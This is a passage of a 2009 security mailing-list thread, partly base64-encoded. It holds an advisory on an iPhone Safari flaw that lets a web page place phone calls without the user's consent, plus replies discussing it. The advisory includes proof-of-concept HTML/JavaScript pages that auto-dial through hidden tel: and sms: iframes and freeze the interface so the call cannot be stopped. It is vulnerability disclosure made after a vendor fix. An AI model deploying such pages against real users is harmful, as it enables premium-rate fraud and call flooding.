Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
